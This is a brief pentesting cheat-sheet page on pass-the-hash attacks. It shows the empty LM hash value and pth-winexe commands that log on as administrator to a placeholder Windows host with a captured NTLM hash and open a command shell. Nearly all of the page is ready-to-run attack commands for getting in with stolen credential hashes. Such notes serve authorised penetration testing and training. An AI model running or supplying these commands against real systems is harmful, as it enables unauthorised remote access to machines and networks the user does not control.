Passing the Hash

Pass the hash

Passing the hash

Authenticate by passing the hash as a password instead of cracking it.

Replace the NOPASSWORD from the hashes with an empty LM hash: aad3b435b51404eeaad3b435b51404ee

pth-(TAB to see Options) 

export SMBHASH=...........HASH.................        # Remove NO PASSWORD on the hashes with an NTLM Hash  

pth-winexe -U administrator% //10.10.10.10 cmd         # Log on to the target

OR (just run the following)

pth-winexe -U administrator%hash //10.10.10.10 cmd     # Log on to the target

Last updated